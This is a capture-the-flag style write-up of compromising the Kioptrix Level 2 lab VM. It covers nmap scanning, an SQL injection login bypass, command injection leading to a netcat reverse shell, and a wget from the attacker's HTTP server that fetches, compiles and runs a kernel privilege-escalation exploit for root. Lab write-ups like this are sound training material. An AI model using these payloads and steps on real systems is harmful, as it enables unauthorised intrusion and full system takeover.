Machine Information
- Kioptrix 2
- Author:
Kioptrix
Host discovery
The target machine is in my own network but I do not have the IP address of the target machine. I started out by discovering the IP address with nmap.
1
2
3
4
5
6
7
8
nmap -sP 192.168.68.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 15:37 +08
Nmap scan report for 192.168.68.110
Host is up (0.00038s latency).
MAC Address: 00:0C:29:1D:4E:E5 (VMware)
Nmap scan report for 192.168.68.108
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.92 seconds
Based on the result, There is a IP address that is identified as VMware. Since the target machine is deployed in VMware, that is the correct IP address for the target machine.
Information Gathering
Now that I have the IP address, the next thing that I do is looking for opened ports. This can be done with nmap as well.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
nmap -p- -A -T4 192.168.68.110
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 15:38 +08
Nmap scan report for 192.168.68.110
Host is up (0.00062s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 663/udp status
|_ 100024 1 666/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-09-05T04:29:05+00:00; -3h09m34s from scanner time.
631/tcp open ipp CUPS 1.1
|_http-server-header: CUPS/1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
666/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:1D:4E:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -3h09m34s
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.68.110
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
There are a few interesting ports that opened such as port 80 which is a web server.
Exploiting Port 80
Usually when port 80 is opened, I will check for the service version and trying to play around with the web application. After looking into the web application, the main page is a login page.
After trying out the login pages, I found out that it is vulnerable to SQL Injection and I managed to login into the web application by using the following exploit ' OR 1=1 -- a.
After login into the web application, there is a web console that allows admin to ping a machine on the network. I tried out to play with the web console and the result looks interesting
Since the result looks exactly like the result from command ping in terminal, I started to try out command injection and noticed that it is vulnerable to command injection.
Since I managed to perform command injection, I decided to exploit it and gain a reverse shell.
1
2
3
4
5
6
nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.68.108] from (UNKNOWN) [192.168.68.110] 32769
sh: no job control in this shell
sh-3.00$ whoami
apache
Once I get a reverse shell, I tried to stabilize the shell
1
2
3
4
5
6
7
8
9
10
sh-3.00$ python -c "import pty;pty.spawn('/bin/bash');"
bash-3.00$ ^Z
zsh: suspended nc -nvlp 1234
┌──(root㉿kali)-[~/tjnull]
└─# stty raw -echo;fg
[1] + continued nc -nvlp 1234
bash-3.00$ export TERM=xterm
bash-3.00$
After stabilizing the shell, I noticed that the shell is not root account which means that I will need to perform privilege escalation.
Privilege Escalation
For privilege escalation, there are something that I always check such as the linux version, SUID binaries and list of commands that can be execute by current user with root privilege. I also used linpeas.sh as it is one of the most popular privilege escalation script.
1
2
3
4
5
6
7
8
9
10
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ uname
Linux
bash-3.00$ lsb_release -a
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final
After getting the version of the linux, I tried out to search for existing exploit to check if it is vulnerable.
1
2
3
4
5
6
7
8
9
searchsploit CentOS 4.5
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Esc | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Esca | linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation | linux/local/35370.c
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Based on the result, there is one exploit that matches the linux version. Since it is a C file, the next thing to do is get the file and send it to the target machine. I used python http server for sending files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
searchsploit -m 9542.c
Exploit: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
URL: https://www.exploit-db.com/exploits/9542
Path: /usr/share/exploitdb/exploits/linux_x86/local/9542.c
Codes: CVE-2009-2698
Verified: True
File Type: C source, ASCII text
Copied to: /root/9542.c
<attacker machine>
python -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
<target machine>
bash-3.00$ wget 192.168.68.108:8081/9542.c
--00:57:32-- http://192.168.68.108:8081/9542.c
=> `9542.c'
Connecting to 192.168.68.108:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]
100%[====================================>] 2,535 --.--K/s
00:57:32 (77.99 MB/s) - `9542.c' saved [2535/2535]
bash-3.00$ ls
9542.c
After the target machine has get the file, The next thing I do is just compile it and run the program.
1
2
3
4
5
6
7
8
bash-3.00$ gcc 9542.c -o exploitee
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
9542.c exploitee
bash-3.00$ chmod +x exploitee
bash-3.00$ ./exploitee
sh-3.00# whoami
root
After running the program, I successfully gain root account in the target machine.
Things i learned from the machine
- SQL injection
- Command Injection
- Stabilizing shell
- Sending files to target machine with python